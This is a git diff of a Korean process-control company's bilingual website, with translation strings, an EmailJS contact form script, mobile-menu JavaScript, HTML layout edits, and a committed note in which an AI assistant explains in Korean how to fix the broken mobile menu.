'svc.s4.title' : '제어 계측기기 협력사', 'svc.s4.title' : '제어 계측기기 협력사',
'svc.s4.desc' : '고객 현장에 대한 깊은 이해를 바탕으로 최적 계측기 선정', 'svc.s4.desc' : '고객 현장에 대한 깊은 이해를 바탕으로 최적 계측기 선정',
'svc.s4.item1' : '한국하니웰(주)', 'svc.s4.item1' : '한국하니웰(주)',
@@ -279,16 +279,16 @@ const translations = {
'svc.s4.item4' : '플로우닉스(주)', 'svc.s4.item4' : '플로우닉스(주)',
'svc.s4.item5' : '(주)코모토', 'svc.s4.item5' : '(주)코모토',
'svc.s4.item6' : '오토닉스(주)', 'svc.s4.item6' : '오토닉스(주)',
'svc.s4.link' : '제품 카탈로그', // 'svc.s4.link' : '제품 카탈로그',
// ABOUT // ABOUT
'about.badge' : '회사 소개', 'about.badge' : '회사 소개',
'about.title' : '공정 자동화의 신뢰할 수 있는 파트너', 'about.title' : '공정 자동화의 신뢰할 수 있는 파트너',
'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.', 'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.',
'about.p2' : 'DCS, SCADA, 계측기기, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.', 'about.p2' : 'DCS, SCADA, 계측기기, 제어반 설계 및 제작, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.',
'about.cert' : '인증', 'about.cert' : '인증',
'about.support' : '지원', 'about.support' : '지원',
'about.years' : '여년간의 공정 제어 전문성', 'about.years' : 'Years of Industrial Excellence',
// CONTACT // CONTACT
'contact.badge' : '문의하기', 'contact.badge' : '문의하기',
@@ -329,8 +329,10 @@ function applyTranslations() {
el.textContent = t(key); el.textContent = t(key);
} }
}); });
// <html lang> 업데이트 // <html lang> 업데이트
document.documentElement.lang = currentLang; document.documentElement.lang = currentLang;
// 버튼 활성 상태 업데이트 // 버튼 활성 상태 업데이트
document.querySelectorAll('.lang-btn').forEach(btn => { document.querySelectorAll('.lang-btn').forEach(btn => {
btn.classList.toggle('active-lang', btn.dataset.lang === currentLang); btn.classList.toggle('active-lang', btn.dataset.lang === currentLang);
@@ -343,4 +345,5 @@ function switchLang(lang) {
applyTranslations(); applyTranslations();
} }
// DOMContentLoaded 시 번역 적용
document.addEventListener('DOMContentLoaded', applyTranslations); document.addEventListener('DOMContentLoaded', applyTranslations);

View File

@@ -0,0 +1,149 @@
// ============================================================
// ★ EmailJS 설정 - 아래 3가지 값을 본인 계정으로 교체하세요 ★
// ============================================================
const EMAILJS_PUBLIC_KEY = 'HO6i369gX6X5HEXtJ';
const EMAILJS_SERVICE_ID = 'service_4ur5lqd';
const EMAILJS_TEMPLATE_ID = 'template_jp0v5qv';
// ============================================================
emailjs.init(EMAILJS_PUBLIC_KEY);
// ── Contact Form ─────────────────────────────────────────────
document.getElementById('contact-submit').addEventListener('click', function () {
const name = document.getElementById('contact-name').value.trim();
const email = document.getElementById('contact-email').value.trim();
const company = document.getElementById('contact-company').value.trim();
const message = document.getElementById('contact-message').value.trim();
const btn = document.getElementById('contact-submit');
if (!name || !email || !message) {
showStatus('error', t('contact.error.required')); return;
}
if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
showStatus('error', t('contact.error.email')); return;
}
btn.disabled = true;
btn.textContent = t('contact.sending');
const templateParams = {
name : name,
message : 'Email : ' + email + '\nCompany : ' + (company || 'N/A') + '\n\n' + message,
reply_to : email
};
emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams)
.then(function () {
showStatus('success', t('contact.success'));
document.getElementById('contact-name').value = '';
document.getElementById('contact-email').value = '';
document.getElementById('contact-company').value = '';
document.getElementById('contact-message').value = '';
})
.catch(function (error) {
console.error('EmailJS error:', error);
showStatus('error', t('contact.error.fail'));
})
.finally(function () {
btn.disabled = false;
btn.textContent = t('contact.btn');
});
});
function showStatus(type, msg) {
const status = document.getElementById('contact-status');
status.classList.remove('hidden', 'bg-green-500/20', 'text-green-400', 'bg-red-500/20', 'text-red-400');
status.classList.add(type === 'success' ? 'bg-green-500/20' : 'bg-red-500/20',
type === 'success' ? 'text-green-400' : 'text-red-400');
status.textContent = msg;
}
// ============================================================
// 메인 스크립트 (전체 기능 포함)
// ============================================================
// DOMContentLoaded 이벤트
document.addEventListener('DOMContentLoaded', () => {
// ============================================================
// 메뉴 토글
// ============================================================
const menuBtn = document.querySelector('#mobile-menu-btn');
const navMenu = document.querySelector('#mobile-menu');
const closeBtn = document.querySelector('#close-menu-btn');
if (menuBtn && navMenu) {
// 메뉴열기
menuBtn.addEventListener('click', () => {
navMenu.classList.remove('translate-x-full');
menuBtn.classList.toggle('open');
});
//메뉴닫기
if (closeBtn) {
closeBtn.addEventListener('click', () => {
navMenu.classList.add('translate-x-full');
});
}
//메뉴 링크 클릭 시 닫기
navMenu.querySelectorAll('a').forEach(link => {
link.addEventListener('click',() => {
navMenu.classList.add('translate-x-full');
});
});
}
// ============================================================
// 스크롤 애니메이션
// ============================================================
const scrollElems = document.querySelectorAll('[data-scroll]');
const observerOptions = {
root: null,
rootMargin: '0px',
threshold: 0.1
};
const scrollObserver = new IntersectionObserver((entries, observer) => {
entries.forEach(entry => {
if (entry.isIntersecting) {
entry.target.classList.add('animate');
observer.unobserve(entry.target);
}
});
}, observerOptions);
scrollElems.forEach(el => scrollObserver.observe(el));
// ============================================================
// 상단 버튼/헤더 스크롤 효과
// ============================================================
const header = document.querySelector('header');
const topBtn = document.querySelector('.back-to-top');
window.addEventListener('scroll', () => {
if (window.scrollY > 50) {
header?.classList.add('scrolled');
topBtn?.classList.add('visible');
} else {
header?.classList.remove('scrolled');
topBtn?.classList.remove('visible');
}
});
topBtn?.addEventListener('click', () => window.scrollTo({ top: 0, behavior: 'smooth' }));
// ============================================================
// 기타 커스텀 이벤트/버튼
// ============================================================
// 예: 상담 신청 모달 열기
document.querySelectorAll('.open-consult').forEach(btn => {
btn.addEventListener('click', () => {
const modal = document.querySelector('#consult-modal');
modal?.classList.add('open');
});
});
// 예: 모달 닫기
document.querySelectorAll('.modal .close-btn').forEach(btn => {
btn.addEventListener('click', () => {
const modal = btn.closest('.modal');
modal?.classList.remove('open');
});
});
});

View File

@@ -0,0 +1,198 @@
모바일 메뉴가 동작하지 않는 문제를 찾았습니다! 🔍
🔴 문제점 발견
1. 클래스명 불일치 (가장 큰 문제!)
script.js:
javascriptconst menuBtn = document.querySelector('.menu-btn'); // ❌ .menu-btn
const navMenu = document.querySelector('.nav-menu'); // ❌ .nav-menu
index.html:
html<button id="mobile-menu-btn" class="md:hidden text-white p-2">
<!-- ❌ 클래스가 없고 ID만 있음 -->
</button>
<div id="mobile-menu" class="fixed inset-0 z-[60] ...">
<!-- ❌ 클래스가 없고 ID만 있음 -->
</div>
→ .menu-btn과 .nav-menu 클래스가 HTML에 없습니다!
2. 닫기 버튼도 작동 안 함
script.js:
javascriptdocument.querySelectorAll('.modal .close-btn').forEach(btn => {
// ❌ .close-btn 클래스를 찾지만...
});
index.html:
html<button id="close-menu-btn" class="text-white text-3xl">&times;</button>
<!-- ❌ .close-btn 클래스가 없음 -->
3. 이벤트 핸들러 중복
script.js 하단:
javascript// 메뉴 토글 코드가 있는데...
const menuBtn = document.querySelector('.menu-btn');
index.html 하단:
html<!-- 하지만 HTML에 별도의 스크립트는 없음 (좋음) -->
📋 문제 요약
요소script.js에서 찾는 것index.html 실제메뉴 버튼.menu-btn#mobile-menu-btn (클래스 없음)메뉴.nav-menu#mobile-menu (클래스 없음)닫기 버튼.modal .close-btn#close-menu-btn (클래스 없음)
✅ 해결 방법 (3가지 옵션)
옵션 1: script.js 수정 (권장)
ID로 찾도록 변경:
javascriptconst menuBtn = document.querySelector('#mobile-menu-btn'); // ID로 변경
const navMenu = document.querySelector('#mobile-menu'); // ID로 변경
옵션 2: index.html 수정
클래스 추가:
html<button id="mobile-menu-btn" class="menu-btn md:hidden text-white p-2">
<div id="mobile-menu" class="nav-menu fixed inset-0 z-[60] ...">
<button id="close-menu-btn" class="close-btn text-white text-3xl">
옵션 3: 둘 다 수정
HTML에 클래스 추가 + script.js도 ID로 변경
🎯 추가 문제점
4. 메뉴 링크 클릭 시 닫기 기능 없음
모바일 메뉴에서 링크 클릭해도 메뉴가 안 닫힙니다:
javascript// 이 기능이 script.js에 없음!
// 메뉴 내부 링크 클릭 시 메뉴 닫기
5. translate-x-full 제어 없음
html<div id="mobile-menu" class="... translate-x-full ...">
이 translate-x-full 클래스를 제거/추가하는 JavaScript가 없습니다!
🔧 수정이 필요한 부분 정리
script.js 수정 필요:
Line 74-75: .menu-btn → #mobile-menu-btn
Line 75: .nav-menu → #mobile-menu
Line 76-79: translate-x-full 제어 추가
닫기 버튼 이벤트 추가
메뉴 링크 클릭 시 닫기 추가
index.html (선택사항):
클래스 추가하면 더 좋지만, script.js만 수정해도 됨
💡 결론
가장 큰 문제: script.js가 존재하지 않는 .menu-btn과 .nav-menu 클래스를 찾고 있어서 menuBtn과 navMenu가 모두 null이 되고, 이벤트가 등록되지 않습니다.
→ ID로 찾도록 변경하면 해결됩니다! 👍<div id="mobile-menu" class="... translate-x-full ...">
이부분 상세하게 다시 알려줘오전 7:37translate-x-full 부분을 상세하게 설명드릴게요!
🔍 현재 상황 분석
index.html 67번 라인:
html<div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500 overflow-y-auto">
📐 translate-x-full의 의미
Tailwind CSS 클래스:
csstranslate-x-full {
transform: translateX(100%);
}
```
**의미**: 화면 밖 오른쪽으로 완전히 이동 (숨김 상태)
### 시각적 설명:
```
[화면] [메뉴]
┌─────┐ ┌─────┐
│ │ │메뉴 │ ← 100% 오른쪽으로 이동
│ │ │숨김 │ (보이지 않음)
└─────┘ └─────┘
❌ 현재 문제점
1. 항상 숨겨진 상태
htmltranslate-x-full ← 이 클래스가 계속 있으면 메뉴가 계속 숨겨짐
2. JavaScript가 이 클래스를 제어하지 않음
script.js 현재 코드:
javascriptmenuBtn.addEventListener('click', () => {
navMenu.classList.toggle('open'); // ❌ 'open' 클래스만 토글
menuBtn.classList.toggle('open'); // ❌ 의미 없음
});
```
**문제**: `open` 클래스가 CSS에 정의되어 있지 않음!
---
## ✅ 올바른 동작 방식
### 작동 원리:
```
닫힌 상태: translate-x-full (오른쪽 밖에 숨김)
↓ (버튼 클릭)
열린 상태: translate-x-full 제거 (화면에 표시)
필요한 JavaScript:
javascriptmenuBtn.addEventListener('click', () => {
navMenu.classList.toggle('translate-x-full');
// ↑
// 이 클래스를 추가/제거해야 함!
});
🎯 정확한 수정 방법
script.js 74-79 라인을 이렇게 수정해야 합니다:
javascript// ❌ 현재 (작동 안 함)
const menuBtn = document.querySelector('.menu-btn');
const navMenu = document.querySelector('.nav-menu');
if (menuBtn && navMenu) {
menuBtn.addEventListener('click', () => {
navMenu.classList.toggle('open'); // ❌ 의미 없음
menuBtn.classList.toggle('open'); // ❌ 의미 없음
});
}
// ✅ 수정 (올바른 방법)
const menuBtn = document.querySelector('#mobile-menu-btn');
const navMenu = document.querySelector('#mobile-menu');
const closeBtn = document.querySelector('#close-menu-btn');
if (menuBtn && navMenu) {
// 메뉴 열기
menuBtn.addEventListener('click', () => {
navMenu.classList.remove('translate-x-full'); // ← 이게 핵심!
});
// 메뉴 닫기
if (closeBtn) {
closeBtn.addEventListener('click', () => {
navMenu.classList.add('translate-x-full'); // ← 다시 숨김
});
}
// 메뉴 링크 클릭 시 닫기
navMenu.querySelectorAll('a').forEach(link => {
link.addEventListener('click', () => {
navMenu.classList.add('translate-x-full');
});
});
}
🎬 애니메이션 동작 순서
1. 초기 상태 (페이지 로드):
html<div id="mobile-menu" class="... translate-x-full ...">
메뉴가 오른쪽 밖에 숨겨짐
2. 햄버거 버튼 클릭:
javascriptnavMenu.classList.remove('translate-x-full');
```
```
화면 밖 → 화면 안으로 슬라이드 (0.5초 duration-500)
3. X 버튼 클릭 또는 링크 클릭:
javascriptnavMenu.classList.add('translate-x-full');
```
```
화면 안 → 화면 밖으로 슬라이드
📊 클래스 상태 변화
상태translate-x-full위치보임닫힘✅ 있음화면 오른쪽 밖 (+100%)❌ 안 보임열림❌ 없음화면 안 (0%)✅ 보임
🎨 CSS 트랜지션
htmltransition-transform duration-500
↑ ↑
변환 애니메이션 0.5초 동안
이 두 클래스 덕분에 부드럽게 슬라이드됩니다!
🔑 핵심 정리
translate-x-full: 메뉴를 오른쪽 밖으로 숨김
remove('translate-x-full'): 메뉴를 화면에 표시
add('translate-x-full'): 메뉴를 다시 숨김
transition-transform duration-500: 부드러운 애니메이션
현재 문제: JavaScript가 translate-x-full을 제어하지 않아서 메뉴가 계속 숨겨진 상태입니다!

View File

@@ -3,7 +3,9 @@
<head> <head>
<meta charset="UTF-8"> <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hanmo Control & Network Co., Ltd. | Control Precision</title> <meta name="description" content="한모씨앤앤은 공정제어 전문 기업입니다. 다양한 정보를 확인하세요.">
<title>한모씨앤앤 | Hanmo Control & Network - DCS SCADA 자동제어</title>
<script src="https://cdn.tailwindcss.com"></script> <script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@200;300;400;500;600;700&family=Space+Grotesk:wght@300;400;500;600;700&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@200;300;400;500;600;700&family=Space+Grotesk:wght@300;400;500;600;700&display=swap" rel="stylesheet">
@@ -36,27 +38,27 @@
</a> </a>
<nav class="hidden md:flex gap-10"> <nav class="hidden md:flex gap-10">
<a href="#home" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.home">Home</a> <a href="#home" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.home">Home</a>
<a href="#dcs" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.dcs">DCS</a> <a href="#dcs" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.dcs">DCS</a>
<a href="#batch" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.batch">Batch Process</a> <a href="#batch" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.batch">Batch Process</a>
<a href="#dbsvr" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.dbsvr">Database Server</a> <a href="#dbsvr" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.dbsvr">Database Server</a>
<a href="#products" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.products">Instruments</a> <a href="#products" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.products">Instruments</a>
<a href="#services" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.services">Services</a> <a href="#services" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.services">Services</a>
<a href="#about" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.about">About</a> <a href="#about" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.about">About</a>
<a href="#contact" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.contact">Contact</a> <a href="#contact" class="nav-link text-sm font-semibold hover:text-blue-500 transition-colors" data-i18n="nav.contact">Contact</a>
</nav> </nav>
<div class="hidden md:flex items-center gap-3"> <div class="hidden md:flex items-center gap-3">
<!-- 언어 전환 버튼 --> <!-- 언어 전환 버튼 -->
<div class="flex rounded-full overflow-hidden border border-black/40"> <div id="lang-container" class="flex rounded-full overflow-hidden border border-white/30 transition-colors duration-300">
<!--<button onclick="switchLang('en')" data-lang="en" class="lang-btn active-lang px-3 py-1.5 text-[10px] font-bold font-industrial text-white transition-all">EN</button> <button onclick="switchLang('en')" data-lang="en" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial">EN</button>
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial text-white transition-all">KO</button>--> <button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial">KO</button>
</div> </div>
<button class="bg-blue-600 hover:bg-blue-700 text-white px-7 py-2.5 rounded-full text-xs font-bold shadow-xl transition-all active:scale-95 font-industrial tracking-widest uppercase" data-i18n="nav.quote">Request Quote</button> <button onclick="location.href='#contact'" class="bg-blue-600 hover:bg-blue-700 text-white px-7 py-2.5 rounded-full text-xs font-bold shadow-xl transition-all active:scale-95 font-industrial tracking-widest uppercase" data-i18n="nav.quote">Inquiry</button>
</div> </div>
<button id="mobile-menu-btn" class="md:hidden text-white p-2"> <button id="mobile-menu-btn" class="menu-btn md:hidden text-white p-2">
<i class="fas fa-bars text-2xl"></i> <i class="fas fa-bars text-2xl"></i>
</button> </button>
</div> </div>
@@ -66,9 +68,9 @@
<div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500 overflow-y-auto"> <div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500 overflow-y-auto">
<div class="flex justify-between items-center mb-12"> <div class="flex justify-between items-center mb-12">
<!-- 모바일 언어 전환 --> <!-- 모바일 언어 전환 -->
<div class="flex rounded-full overflow-hidden border border-white/20"> <div class="flex rounded-full overflow-hidden border border-white/30">
<button onclick="switchLang('en')" data-lang="en" class="lang-btn active-lang px-4 py-2 text-xs font-bold font-industrial text-white transition-all">EN</button> <button onclick="switchLang('en')" data-lang="en" class="lang-btn px-4 py-2 text-xs font-bold font-industrial">EN</button>
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-4 py-2 text-xs font-bold font-industrial text-white transition-all">KO</button> <button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-4 py-2 text-xs font-bold font-industrial">KO</button>
</div> </div>
<button id="close-menu-btn" class="text-white text-3xl">&times;</button> <button id="close-menu-btn" class="text-white text-3xl">&times;</button>
</div> </div>
@@ -81,7 +83,7 @@
<a href="#services" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.services">Services</a> <a href="#services" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.services">Services</a>
<a href="#about" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.about">About</a> <a href="#about" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.about">About</a>
<a href="#contact" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.contact">Contact</a> <a href="#contact" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.contact">Contact</a>
<button class="mt-8 bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold font-industrial tracking-widest uppercase transition-colors" data-i18n="nav.quote">Request Quote</button> <button onclick="location.href='#contact'" class="mt-8 bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold font-industrial tracking-widest uppercase transition-colors" data-i18n="nav.quote">Inquiry</button>
</nav> </nav>
</div> </div>
@@ -127,47 +129,95 @@
</div> </div>
</div> </div>
</section> </section>
<!-- DCS Section -->
<!-- DCS SECTION -->
<section id="dcs" class="py-32 bg-white"> <section id="dcs" class="py-32 bg-white">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24"> <div class="text-center max-w-3xl mx-auto mb-24">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">Advanced Control Systems</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">DCS Integration</h3> Advanced Control Systems
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.</p> </h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">
DCS Integration
</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">
Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.
</p>
</div> </div>
<div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto"> <div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto">
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover"></div> <!-- 이미지 -->
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl">
<img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover">
</div>
<div> <div>
<div class="space-y-18"> <!-- Honeywell 로고 + 설명 (맨 위로 이동) -->
<!-- Honeywell 로고 이미지 추가 --> <div class="mb-12">
<img src="assets/images/honeywell-logo.svg" alt="Honeywell Logo" class="h-8 w-auto mb-4 object-contain"> <img src="assets/images/honeywell-logo.svg" alt="Honeywell Logo" class="h-8 w-auto mb-4 object-contain">
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f0.desc">
Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance
</p>
</div>
<!-- 아이콘 리스트 -->
<div class="space-y-6">
<div class="flex gap-6"> <div class="flex gap-6">
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f0.desc">Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance</p></div> <div class="flex-shrink-0">
</div> <div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<div class="flex gap-6"> <i class="fas fa-shield-alt"></i>
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-shield-alt"></i></div></div> </div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">Fault-tolerant systems with dual processing units ensuring 99.99% uptime</p></div> </div>
</div> <div>
<div class="flex gap-6"> <h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4>
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-network-wired"></i></div></div> <p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">Sub-millisecond response times with synchronized control across multiple nodes</p></div> Fault-tolerant systems with dual processing units ensuring 99.99% uptime
</p>
</div>
</div> </div>
<div class="flex gap-6"> <div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-lock"></i></div></div> <div class="flex-shrink-0">
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">IEC 62443 compliance with military-grade encryption protocols</p></div> <div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-network-wired"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">
Sub-millisecond response times with synchronized control across multiple nodes
</p>
</div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0">
<div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-lock"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">
IEC 62443 compliance with military-grade encryption protocols
</p>
</div>
</div> </div>
</div> </div>
<div class="mt-12"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">Request Technical Specs</a></div>
<!-- 버튼 -->
<div class="mt-12">
<a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">
Request Technical Specs
</a>
</div>
</div> </div>
</div> </div>
</div> </div>
</section> </section>
<!-- BATCH PROCESS SECTION --> <!-- BATCH PROCESS SECTION -->
<section id="batch" class="pt-24 pb-32 bg-slate-50"> <section id="batch" class="py-32 bg-slate-50">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-8"> <!--아래 내용과의 간 mb-16에서 줄임--> <div class="text-center max-w-3xl mx-auto mb-8"> <!--아래 내용과의 간 mb-16에서 줄임-->
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="batch.title">Batch Process Control</h3> <h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="batch.title">Batch Process Control</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="batch.desc">Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.</p> <p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="batch.desc">Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.</p>
@@ -202,7 +252,6 @@
</div> </div>
</div> </div>
</section> </section>
<!-- DATABASE SERVER SECTION --> <!-- DATABASE SERVER SECTION -->
<section id="dbsvr" class="py-32 bg-white"> <section id="dbsvr" class="py-32 bg-white">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
@@ -243,97 +292,97 @@
</ul> </ul>
</div> </div>
</div> </div>
<div class="text-center mt-16"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="db.btn">Get Infrastructure Consultation</a></div> <!-- <div class="text-center mt-16"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="db.btn">Get Infrastructure Consultation</a></div> -->
</div> </div>
</section> </section>
<!-- INSTRUMENTS SECTION --> <!-- INSTRUMENTS SECTION -->
<section id="products" class="py-32 bg-slate-50"> <section id="products" class="py-32 bg-slate-50">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24"> <div class="text-center max-w-3xl mx-auto mb-12">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="inst.badge">Precision Measurement</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="inst.badge">Precision Measurement</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="inst.title">Control Instruments</h3> <h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="inst.title">Control Instruments</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="inst.desc">Smart field instruments engineered for accuracy and reliability in demanding industrial environments.</p> <p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="inst.desc">Optimal Precision Starts with Understanding of Your Environment</p>
</div> </div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8"> <div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
